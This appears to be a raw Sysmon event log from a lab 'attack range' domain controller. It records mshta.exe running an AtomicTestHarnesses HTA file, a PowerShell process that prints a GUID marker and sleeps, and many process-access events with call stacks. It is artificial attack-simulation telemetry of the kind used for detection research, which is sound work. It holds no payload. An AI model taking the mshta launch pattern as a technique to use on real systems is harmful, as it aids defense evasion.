(rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=65D86C34814C02569E2AD53FD24E7F61,SHA256=8133502266008B77DE7921451E1210B0EF3F0ED2DB7D8D3EE0C3350D856FA6FA,IMPHASH=5E0145CEF36FA9BFBA7DE33AA683B8ED{7901BC46-5357-6008-3F06-00000000A301}4668C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} 10341000x800000000000000023714Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.757{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5357-6008-3F06-00000000A301}4668C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023713Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.757{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5357-6008-3F06-00000000A301}4668C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023712Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.757{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-5357-6008-3F06-00000000A301}4668C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023711Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.741{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5357-6008-3F06-00000000A301}4668C:\Windows\SysWOW64\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023710Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.741{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5357-6008-3F06-00000000A301}4668C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023709Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.741{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5357-6008-3F06-00000000A301}4668C:\Windows\SysWOW64\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023708Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.741{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5357-6008-3F06-00000000A301}4668C:\Windows\SysWOW64\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023707Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.710{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023706Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.710{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023705Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.710{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023704Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.710{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-5357-6008-3F06-00000000A301}4668C:\Windows\SysWOW64\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023703Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.710{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023702Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.710{7901BC46-5357-6008-3E06-00000000A301}67603236C:\Windows\explorer.exe{7901BC46-5357-6008-3F06-00000000A301}4668C:\Windows\SysWOW64\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+8fe71|C:\Windows\System32\SHELL32.dll+8ecd6|C:\Windows\System32\SHELL32.dll+cfbb1|C:\Windows\System32\SHELL32.dll+b5dbe|C:\Windows\System32\SHELL32.dll+8db63|C:\Windows\System32\SHELL32.dll+8da2b|C:\Windows\System32\SHELL32.dll+8d347|C:\Windows\System32\SHELL32.dll+6b47e|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 154100x800000000000000023701Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.719{7901BC46-5357-6008-3F06-00000000A301}4668C:\Windows\SysWOW64\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=A65AE0DB1DAA6B07C89DCC1E21D3EB42,SHA256=5B6429B98ADF532E6F694C9A6CD1A1943B4AA3D5EA524D4FB353939FD9C61342,IMPHASH=79925B1930721457F5E11BF877806843{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding 10341000x800000000000000023700Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.710{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023699Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.710{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023698Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.679{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023697Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.679{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023696Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.679{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023695Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.663{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023694Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.663{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023693Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.663{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023692Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.663{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023691Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.663{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023690Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.663{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023689Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.663{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000023688Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.665{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe10.0.14393.4169 (rs1_release.210107-1130)Windows ExplorerMicrosoft® Windows® Operating SystemMicrosoft CorporationEXPLORER.EXEC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=F7FDECA990692D53D7E4E396B0BD711E,SHA256=1F955612E7DB9BB037751A89DAE78DFAF03D7C1BCC62DF2EF019F6CFE6D1BBA7,IMPHASH=8D2880102609AA4B23679BD4FEBEBC95{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000023687Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.648{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-5357-6008-3D06-00000000A301}3032C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023686Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 